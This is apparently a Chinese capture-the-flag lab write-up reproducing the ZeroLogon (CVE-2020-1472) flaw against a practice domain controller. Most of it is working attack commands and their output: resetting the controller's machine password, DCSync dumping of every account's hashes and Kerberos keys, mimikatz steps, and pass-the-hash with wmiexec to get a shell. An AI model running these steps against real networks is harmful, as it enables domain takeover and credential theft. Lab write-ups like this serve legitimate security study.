本文最后更新于 2026-09-08T11:18:22+08:00
靶场介绍
- 网络地址
1 2
| 目标地址:192.168.111.100 本机地址:192.168.111.25
|
【复现】CVE-2020-1472 ZeroLogon 漏洞
漏洞概述
Zerologon(CVE-2020-1472)是Netlogon远程协议的一个特权提升漏洞,可以在不提供任何据的情况下通过身份验证,并实现域内提权。
环境共有两台机器,用于测试两种情况,分别为攻击机在域中以及不在域中的情况 靶场环境来自:https://suhaynn.github.io/2025/06/21/【复现】CVE-2020-1472 ZeroLogon漏洞/#靶场环境
域内机器账号密码请前往来源获取
WP:https://suhaynn.github.io/2025/06/21/%E3%80%90%E5%A4%8D%E7%8E%B0%E3%80%91CVE-2020-1472%20ZeroLogon%E6%BC%8F%E6%B4%9E/#%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E6%BC%8F%E6%B4%9E-1
知识点
Zerologon(CVE-2020-1472)是 Netlogon 远程协议的一个特权提升漏洞,可以在不提供任何凭据的情况下通过身份验证,并实现域内提权。
该漏洞的最常见的利用方法是调用 Netlogon 中的 RPC 函数 NetrServerPasswordSet2 来重置域控的机器账户的密码,从而以域控制器的机器账户的身份进行 Dcsync 获取域管权限。
注意,这里重置的是域控机器账户的密码,与域管的密码无关**,**该密码由系统随机生成,密码强度是 120 个字符,并且会定时更新。
机器账户是不允许登录的,所以不能直接通过重置后的机器账户来登陆域控制器。但是,域控制器的机器账户在默认情况下拥有 DCSync 权限,因此可以通过 DCSync 攻击导出域管理员甚至所有用户密码的哈希值,进而获取域控权限
这个漏洞完整的利用,需要域控开启 135 和 445 端口。
打靶过程
impacket攻击
fscan 扫一下
1
| fscan.exe -h 192.168.111.100
|

135 和 445 端口都是开启的,主机名是:masterpc
继续利用 CVE-2020-1472 ZeroLogon 漏洞,借助 AI 写了一个利用脚本
检测漏洞
1
| python CVE-2020-1472.py check masterpc 192.168.111.100
|
存在漏洞

置空机器账户密码
1
| python CVE-2020-1472.py exploit masterpc 192.168.111.100 --force
|

- DCSync 抓 hash
1
| python CVE-2020-1472.py dcsync masterpc 192.168.111.100 --all
|

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
| Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5d6179aa303cb80767dd808af8e7949b::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: masteruser:1000:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218::: myd.com\alex:1107:aad3b435b51404eeaad3b435b51404ee:d92b40c276ae016de921403adf6e2714::: myd.com\tom:1112:aad3b435b51404eeaad3b435b51404ee:d92b40c276ae016de921403adf6e2714::: MASTERPC$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WIN7PC$:1104:aad3b435b51404eeaad3b435b51404ee:fba0ef9bd33b6d683c4c5afef2420347::: WIN10PC$:1108:aad3b435b51404eeaad3b435b51404ee:b80ec1bd8d779daf7c8aba0df0b0b3a5::: BACKUPPC$:1110:aad3b435b51404eeaad3b435b51404ee:0a24d18aa71033fc7475b36374cfa646::: SER12PC$:1113:aad3b435b51404eeaad3b435b51404ee:821d0d4ef0c0af19fb9ae76fb2423aaf::: [*] Kerberos keys grabbed krbtgt:aes256-cts-hmac-sha1-96:673497346e4a840a2937edc9f20c9dadf8e3fa36762f8a80d10dc6c899fd30bd krbtgt:aes128-cts-hmac-sha1-96:2f8352e16bd2241be1654915d81a2d7d krbtgt:des-cbc-md5:8331fb76e96d1ab6 myd.com\alex:aes256-cts-hmac-sha1-96:95e2507abb2745ac5c3bf174b623848fbf575e30b3ce5e5004d961c45523560f myd.com\alex:aes128-cts-hmac-sha1-96:6d03b9b5f98c3121ebd1e2df6473f851 myd.com\alex:des-cbc-md5:a4674c8f9dd640cd myd.com\tom:aes256-cts-hmac-sha1-96:ee3384a48741df4ac23638b1bda36376e1d48385915f8381ae7c3520eaa6b3c9 myd.com\tom:aes128-cts-hmac-sha1-96:77a2c45be49f9b67c29971e111d77219 myd.com\tom:des-cbc-md5:ae8ccb19cd0ed675 MASTERPC$:aes256-cts-hmac-sha1-96:3054d8539c1cc2ad543e5122911c20741dac437a06f0ec91926d8fdea6c4892a MASTERPC$:aes128-cts-hmac-sha1-96:59b4146c6c92b85853c2463904da4fd3 MASTERPC$:des-cbc-md5:d34f02fd58dc5e79 WIN7PC$:aes256-cts-hmac-sha1-96:0ce42c9e2b4dae863e9c89fcb544044b6ad0ab163a9c5ec0654a387188401758 WIN7PC$:aes128-cts-hmac-sha1-96:cf5f272afedad5da97673bb134f8e624 WIN7PC$:des-cbc-md5:f13e5415b6e00db6 WIN10PC$:aes256-cts-hmac-sha1-96:ca924d18a9cb0e0c0b18c8ef2d3cf570ba9a387ffa066b7d0c594183fa0c44ba WIN10PC$:aes128-cts-hmac-sha1-96:22d54361b292d21d619a14c0da816ed6 WIN10PC$:des-cbc-md5:bc6ee3dc3e851934 BACKUPPC$:aes256-cts-hmac-sha1-96:2e19705625a7e08e20cd7b817ed4168a36535ce97f7b2d66621b47d092697135 BACKUPPC$:aes128-cts-hmac-sha1-96:b6a9c337be3415c0290988821199544c BACKUPPC$:des-cbc-md5:ae4601f851c76145 SER12PC$:aes256-cts-hmac-sha1-96:4b23645c727fad5699b4adb4b44e92b1813e97026c8cb4fbba99db984e8585b1 SER12PC$:aes128-cts-hmac-sha1-96:9b01c72dbc5f89c4c7d13038715a9bf8 SER12PC$:des-cbc-md5:3d1a1ada68c72f9e
|
拿到了所有用户的 hash 了,其中 masterpc$ 的NTML hash已经被置空了

Administrator 有解开的可能

借用强哥的账号,在棉花糖可以解出来:https://bdziyi.com/mmd5/,密码是:master@123.

实际上WP里写了:

也可以不解密,有了 hash 可以进行 PTH 攻击,可以用 wmiexec.py,是 Python 自带的
1 2 3
| python wmiexec.py -hashes 域管理员hash c域名/Administrator@域控IP
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218 myd.com/Administrator@192.168.111.100
|
拿到 shell

拿到flag

1
| flag{48255d2fc759b14f4127fda7c5a86d89}
|
mimikatz攻击
mimikatz工具地址:https://github.com/gentilkiwi/mimikatz/
先检测一下漏洞是否存在
1
| mimikatz.exe "privilege::debug" "lsadump::zerologon /target:192.168.111.100 /account:masterpc$" "exit"
|

确实存在漏洞,继续重置哈希,攻击机在域中的话可以用:/target:masterpc.myd.com
1
| mimikatz.exe "lsadump::zerologon /target:masterpc.myd.com /ntlm /null /account:masterpc$ /exploit" "exit"
|
这里用的宿主机,可以直接用 IP
1
| mimikatz.exe "lsadump::zerologon /target:192.168.111.100 /ntlm /null /account:masterpc$ /exploit" "exit"
|

最后导出域管hash
注意:这里/dc 后面一定要跟域名格式的域控的 FQDN,所以这就意味着,当前攻击的机器必须将 DNS 服务器指为域控,这样才能解析
1
| mimikatz.exe "lsadump::dcsync /csv /domain:myd.com /dc:masterpc.myd.com /user:administrator /authuser:masterpc$ /authpassword:\"\" /authntlm" "exit"
|
我这里宿主机不在域内,失败了

贴一下 WP 里的图

拿到:ec0df45863a3751d56ba6df1e72f7218
然后就可以远程连接域控 PTH 攻击
用刚刚导出来的 administrator 用户的哈希连接域控,这一步需要 privilege::debug 提权
1
| mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:192.168.111.100 /rc4:ec0df45863a3751d56ba6df1e72f7218" "exit"
|

恢复域控的机器用户哈希
https://suhaynn.github.io/2025/06/21/%E3%80%90%E5%A4%8D%E7%8E%B0%E3%80%91CVE-2020-1472%20ZeroLogon%E6%BC%8F%E6%B4%9E/#%E6%81%A2%E5%A4%8D%E5%9F%9F%E6%8E%A7%E7%9A%84%E6%9C%BA%E5%99%A8%E7%94%A8%E6%88%B7%E5%93%88%E5%B8%8C